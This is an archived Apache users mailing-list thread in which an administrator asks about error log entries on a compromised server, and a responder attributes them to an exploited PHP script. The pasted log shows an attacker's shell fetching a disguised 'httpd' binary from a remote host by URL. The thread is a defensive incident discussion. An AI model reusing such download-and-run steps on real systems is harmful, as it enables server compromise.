You are viewing a plain text version of this content. The canonical link for it is here.
Posted to users@httpd.apache.org by "James R. Hay" <jr...@haya.qc.ca> on 2006/01/28 21:55:31 UTC
[users@httpd] Origin of error log entries?
Hi folks,
I sent this last night but didn't see it come through and I realize that I
did not mention that this occurred on a linux server running apache
1.3.34.
Thanks for any advice or suggestions.
Thanks,
Jim.
James R. Hay jrhay@HayA.QC.CA
Hay-Net Networks
P.O. Box 46051
Pointe Claire, QC
H9R 5R4
---------- Forwarded message ----------
Date: Sat, 28 Jan 2006 01:38:50 -0500 (EST)
From: James R. Hay <jr...@HayA.QC.CA>
To: users@httpd.apache.org
Subject: Origin of error log entries?
The entries below were found in the Apache error log while investigating on
apparent exploit. Thus far I have not found any corresponding access log entry
and I am wondering if this is an indication that the intruder gained a shell?
httpd(315): Operation not permitted
sh: line 1: fetch: command not found
--00:44:12-- http://members.lycos.co.uk/img00d/httpd
=> `httpd'
Resolving members.lycos.co.uk... done.
Connecting to members.lycos.co.uk[212.78.204.20]:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 29,662 [text/plain]
0K .......... .......... ........ 100% 68.00 KB/s
00:44:13 (68.00 KB/s) - `httpd' saved [29662/29662]
php.cgi: no process killed
This begs the question of what is the source of entries for the error log? THe
virtual domains have their own logs and there should be no entries for any
websites in the main access or error logs.
Any suggestions would be appreciated.
Thanks,
Jim.
James R. Hay jrhay@HayA.QC.CA
Hay-Net Networks
P.O. Box 46051
Pointe Claire, QC
H9R 5R4
---------------------------------------------------------------------
The official User-To-User support forum of the Apache HTTP Server Project.
See <URL:http://httpd.apache.org/userslist.html> for more info.
To unsubscribe, e-mail: users-unsubscribe@httpd.apache.org
" from the digest: users-digest-unsubscribe@httpd.apache.org
For additional commands, e-mail: users-help@httpd.apache.org
Re: [users@httpd] Origin of error log entries?
Posted by Joshua Slive <jo...@slive.ca>.
On 1/28/06, James R. Hay <jr...@haya.qc.ca> wrote:
>
> Ok, so my intuition that somewhere I should find a corresponding entry in
> an access log for one of the websites is correct, presumably somewhere
> near the time of the timestamp from the error log.
Yes.
> So, this goes more into PHP than Apache but would presumably suggest
> either a script allowing an upload or a query string that was exploited or
> the like.
Yes.
It is most likely an exploit in a standard php application, because
those are much easier to exploit using automated tools. A problem in
a custom written php script would require more effort to find. So
check the common problems like phpbb, phpnuke, etc.
Joshua.
---------------------------------------------------------------------
The official User-To-User support forum of the Apache HTTP Server Project.
See <URL:http://httpd.apache.org/userslist.html> for more info.
To unsubscribe, e-mail: users-unsubscribe@httpd.apache.org
" from the digest: users-digest-unsubscribe@httpd.apache.org
For additional commands, e-mail: users-help@httpd.apache.org
Re: [users@httpd] Origin of error log entries?
Posted by "James R. Hay" <jr...@haya.qc.ca>.
Ok, so my intuition that somewhere I should find a corresponding entry in
an access log for one of the websites is correct, presumably somewhere
near the time of the timestamp from the error log.
So, this goes more into PHP than Apache but would presumably suggest
either a script allowing an upload or a query string that was exploited or
the like.
Thanks very much.
Jim.
On Sat, 28 Jan 2006, Joshua Slive wrote:
> On 1/28/06, James R. Hay <jr...@haya.qc.ca> wrote:
>> The entries below were found in the Apache error log while investigating on
>> apparent exploit. Thus far I have not found any corresponding access log entry
>> and I am wondering if this is an indication that the intruder gained a shell?
>
> Close enough. It is the stderr from a broken script someplace, most
> likely indicating that you have a compromised php script on your
> system.
>
> Joshua.
>
> ---------------------------------------------------------------------
> The official User-To-User support forum of the Apache HTTP Server Project.
> See <URL:http://httpd.apache.org/userslist.html> for more info.
> To unsubscribe, e-mail: users-unsubscribe@httpd.apache.org
> " from the digest: users-digest-unsubscribe@httpd.apache.org
> For additional commands, e-mail: users-help@httpd.apache.org
>
James R. Hay jrhay@HayA.QC.CA
Hay-Net Networks
P.O. Box 46051
Pointe Claire, QC
H9R 5R4
---------------------------------------------------------------------
The official User-To-User support forum of the Apache HTTP Server Project.
See <URL:http://httpd.apache.org/userslist.html> for more info.
To unsubscribe, e-mail: users-unsubscribe@httpd.apache.org
" from the digest: users-digest-unsubscribe@httpd.apache.org
For additional commands, e-mail: users-help@httpd.apache.org
Re: [users@httpd] Origin of error log entries?
Posted by Joshua Slive <jo...@slive.ca>.
On 1/28/06, James R. Hay <jr...@haya.qc.ca> wrote:
> The entries below were found in the Apache error log while investigating on
> apparent exploit. Thus far I have not found any corresponding access log entry
> and I am wondering if this is an indication that the intruder gained a shell?
Close enough. It is the stderr from a broken script someplace, most
likely indicating that you have a compromised php script on your
system.
Joshua.
---------------------------------------------------------------------
The official User-To-User support forum of the Apache HTTP Server Project.
See <URL:http://httpd.apache.org/userslist.html> for more info.
To unsubscribe, e-mail: users-unsubscribe@httpd.apache.org
" from the digest: users-digest-unsubscribe@httpd.apache.org
For additional commands, e-mail: users-help@httpd.apache.org